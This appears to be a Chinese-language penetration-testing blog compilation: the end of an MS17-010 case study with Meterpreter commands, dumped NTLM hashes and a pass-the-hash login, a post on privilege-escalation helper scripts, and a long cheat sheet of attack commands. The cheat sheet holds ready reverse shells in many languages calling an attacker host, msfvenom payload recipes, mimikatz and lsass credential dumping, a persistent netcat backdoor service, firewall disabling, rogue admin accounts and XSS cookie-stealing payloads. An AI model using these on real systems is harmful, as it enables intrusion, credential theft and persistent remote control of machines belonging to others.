    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session.
    transport                 Change the current transport mechanism
    use                       Deprecated alias for 'load'
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes
meterpreter > screenshot
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bca55919186bf4443840164612ce9f77:::
kevin:1106:aad3b435b51404eeaad3b435b51404ee:aef3d57f355a02297fc386630a01449e:::
robert:1110:aad3b435b51404eeaad3b435b51404ee:0d3f32016ee8a42ba768d558875d57e5:::
avfisher:1120:aad3b435b51404eeaad3b435b51404ee:ef28083240cb79a25adb4290ce6cb67b:::
MASTER$:1000:aad3b435b51404eeaad3b435b51404ee:e0a6ad80117cbe539c459dafc5291f27:::
SLAVE$:1103:aad3b435b51404eeaad3b435b51404ee:789cf984d53d9616fca933d37e974209:::
OBSERVER$:1111:aad3b435b51404eeaad3b435b51404ee:d60552ce7c9dc4fabdf0ba4e5fc46f69:::

补充:

拿到了Hash之后我们就可以进行Pass The Hash攻击了,例如,从上一步我们可以看到Administrator的NTLM hash是 aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e, 因此可以直接利用这个Hash登陆目标机器10.11.1.220:

# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:0598acedc0122622ad85afc9e66d329e

# pth-winexe -U Administrator% //10.11.1.220 cmd
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
thinc\administrator

C:\Windows\system32>

0x03 小结

总结一下本案例中的渗透思路:

  1. 利用nmap批量扫描开放smb服务端口的主机
  2. 利用nmap扫描存在smb漏洞的服务主机
  3. 利用ms17-010验证和攻击目标主机并反弹shell
  4. 制作更加稳定可靠的meterpreter payload
  5. 利用powershell脚本下载meterpreter并执行
  6. 获得meterpreter为进一步渗透做准备

注:转载请注明出处,尊重知识产权从你我开始,谢谢!

本地提权工具箱

0x01 背景

在我们平时渗透的过程中经常会遇到需要提权的情况,本文将介绍一些方便大家在Windows和Linux进行提权的工具。

0x02 本地提权之Windows

本工具适合在任何Windows服务器上进行已知提权漏洞的检测以及相应的提权EXP下载。

工具地址:https://github.com/brianwrf/WinSystemHelper

使用方法:

1. 拷贝WinSysHelper.bat, explt2003.txt和expgt2003.txt文件至目标Windows服务器上

2. 命令行下运行WinSysHelper.bat执行检测

3. 按照提示下载EXP进行提权

0x03 本地提权之Linux

本工具适合在任何Linux服务器上进行已知提权漏洞的检测以及相应的提权EXP下载。

工具地址: https://github.com/brianwrf/RootHelper

使用方法:

1. 拷贝脚本roothelper.sh至目标Linux服务器上

2. 添加执行权限并执行./roothelper.sh

3. 按照提示命令,下载提权EXP进行本地提权

声明:本工具具有一定的攻击性,仅供学习,请确保在已授权的服务器上进行操作,否则一切后果自负。

渗透测试技巧总结

原文链接:https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/#wordpress-scanner

Nmap之Web漏洞扫描

cd /usr/share/nmap/scripts/
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target


Dirb之目录蛮力破解

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt


Nikto之Web服务器扫描

nikto -C all -h http://IP


WorkPress扫描器

git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http://IP/ –enumerate p


HTTP指纹识别

wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt


SKIP Fish扫描器

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP


Nmap之端口扫描

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
2)fargement
3)data packed – like orginal one not scan packet
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
5)nmap –source-port 53 target
nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)


NC扫描

nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done


Unicornscan

us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

-H resolve hostnames during the reporting phase
-m scan mode (sf - tcp, U - udp)
-Iv - verbose


Xprobe2操作系统指纹识别

xprobe2 -v -p tcp:80:open IP


Samba枚举

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target


SNMP枚举

snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP


Windows常见命令

net localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits


PuTTY链接隧道

Forward remote port to local address
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP


Meterpreter之端口转发

# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389


Windows命令之开启RDP访问

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable


Windows命令之关闭Windows防火墙

netsh firewall set opmode disable


Meterpreter之VNC\RDP

# https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
run getgui -u admin -p 1234
run vnc -p 5043


Windows命令之添加新用户

net user test 1234 /add
net localgroup administrators test /add


Mimikatz使用

git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full


Windows之Hashdump

git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd

or

apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

or

meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell


Hashcat之密码破解

hashcat -m 400 -a 0 hash /root/rockyou.txt


Netcat常见使用

c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt


Netcat之Banner抓取

nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/4.0
Referrer: www.example.com
<enter>
<enter>


Windows反弹shell

c:>nc -Lp 31337 -vv -e cmd.exe
nc 192.168.0.10 31337
c:>nc example.com 80 -e cmd.exe
nc -lp 80

nc -lp 31337 -e /bin/bash
nc 192.168.0.10 31337
nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000


查找SUID\SGID root文件

# Find SUID root files
find / -user root -perm -4000 -print

# Find SGID root files:
find / -group root -perm -2000 -print

# Find SUID and SGID files owned by anyone:
find / -perm -4000 -o -perm -2000 -print

# Find files that are not owned by any user:
find / -nouser -print

# Find files that are not owned by any group:
find / -nogroup -print

# Find symlinks and what they point to:
find / -type l -ls


Python shell

python -c 'import pty;pty.spawn("/bin/bash")'


Python\Ruby\PHP之HTTP服务器创建

python2 -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888


获取进程ID

fuser -nv tcp 80
fuser -k -n tcp 80


Hydra之RDP蛮力破解

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp


Windows命令之挂载远程文件夹共享

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw


Kali下编译exploit

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)


Kali下编译Windows Exploits

wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe


NASM常用命令

nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload


SSH Pivoting

ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target


SSH Pivoting之不同网络间

ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target


Metasploit之Pivoting

route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

or

# https://www.offensive-security.com/metasploit-unleashed/pivoting/
meterpreter > ipconfig
IP Address  : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0          255.255.255.0      Session 1
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address  : 10.1.13.2


使用CSV文件查询Exploit-DB

git clone https://github.com/offensive-security/exploit-database.git
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit "Linux Kernel"

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3


使用MSF生成payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c


使用MSF生成Linux下meterpreter反弹shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell


使用MSF生成反弹shell(C shellcode)

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c


使用MSF生成基于Python的反弹shell

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py


使用MSF生成基于ASP的反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp


使用MSF生成基于Bash的反弹shell

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh


使用MSF生成基于php的反弹shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
add <?php at the beginning
perl -i~ -0777pe's/^/<?php \n/' shell.php


使用MSF生成Windows下的反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe


Linux的安全检查命令

# find programs with a set uid bit
find / -uid 0 -perm -4000

# find things that are world writable
find / -perm -o=w

# find names with dots and spaces, there shouldn’t be any
find / -name " " -print
find / -name ".." -print
find / -name ". " -print
find / -name " " -print

# find files that are not owned by anyone
find / -nouser

# look for files that are unlinked
lsof +L1

# get information about procceses with open ports
lsof -i

# look for weird things in arp
arp -a

# look at all accounts including AD
getent passwd

# look at all groups and membership including AD
getent group

# list crontabs for all users including AD
for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done

# generate random passwords
cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4

# find all immutable files, there should not be any
find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’

# fix immutable files
chattr -i file


Windows的缓冲区溢出利用的命令

msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c

COMMONLY USED BAD CHARACTERS:
\x00\x0a\x0d\x20                              For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c           Ending with (0\n\r_)

# Useful Commands:
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr modules
!pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona\%p
!mona config -get workingfolder
!mona mod
!mona bytearray -b "\x00\x0a"
!mona pc 5000
!mona po EIP
!mona suggest


SEH – Structured Exception Handling

# https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
!mona suggest
!mona nosafeseh
nseh="\xeb\x06\x90\x90" (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)


ROP(DEP)

# https://en.wikipedia.org/wiki/Return-oriented_programming
# https://en.wikipedia.org/wiki/Data_Execution_Prevention
!mona modules
!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)


ASLR – Address space layout randomization

# https://en.wikipedia.org/wiki/Address_space_layout_randomization
!mona noaslr


EGG Hunter techniques

# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
# http://www.fuzzysecurity.com/tutorials/expDev/4.html
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t 'w00t'


GDB Debugger Commands

# Setting Breakpoint
break *_start

# Execute Next Instruction
next
step
n
s

# Continue Execution
continue
c

# Data
checking 'REGISTERS' and 'MEMORY'

# Display Register Values: (Decimal,Binary,Hex)
print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)

# Display values of specific memory locations
command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)


BASH Reverse Shell

bash -i >& /dev/tcp/X.X.X.X/443 0>&1

exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1


PERL Reverse Shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

# for win platform
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’


RUBY Reverse Shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

# for win platform
ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


PYTHON Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


PHP Reverse Shell

php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'


JAVA Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()


NETCAT Reverse Shell

nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443

# If the -e option is disabled, try this
# mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/

# If you have the wrong version of netcat installed, try
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f


TELNET Reverse Shell

# If netcat is not available or /dev/tcp
mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe


XTERM Reverse Shell

# Start an open X Server on your system (:1 – which listens on TCP port 6001)
apt-get install xnest
Xnest :1

# Then remember to authorise on your system the target IP to connect to you
xterm -display 127.0.0.1:1

# Run this INSIDE the spawned xterm on the open X Server
xhost +targetip

# Then on the target connect back to the your X Server
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm


XSS Cheat Codes

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
("< iframes > src=http://IP:PORT </ iframes >")

<script>document.location=http://IP:PORT</script>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

";!–"<XSS>=&amp;amp;{()}

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"">
<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>

<IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
<IMG SRC="jav ascript:alert('XSS');">

perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out

<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(">< iframes http://google.com < iframes >)

<BODY BACKGROUND="javascript:alert('XSS')">
<FRAMESET><FRAME SRC=”javascript:alert('XSS');"></FRAMESET>
"><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
"><s"%2b"cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
<img src=asdf onerror=alert(document.cookie)>


SSH Over SCTP (With Socat)

# on remote server
# assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP
$ socat SCTP-LISTEN:80,fork TCP:localhost:22

# localhost
# replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :)
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80

# create socks proxy
# replace username and -p port value as needed...
$ ssh -lusername localhost -D 8080 -p 1337


Install Metasploit Community Edition in Kali 2.0

# github urls
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run && chmod
+x metasploit-latest-linux-x64-installer.run && ./metasploit-latest-linux-x64-installer.run

# create user
$ /opt/metasploit/createuser
[*] Please enter a username: root
[*] Creating user 'root' with password 'LsRRV[I^5' ...

# activate your metasploit license
https://localhost:3790

# update metasploite
$ /opt/metasploit/app/msfupdate

# use msfconsole
$ /opt/metasploit/app/msfconsole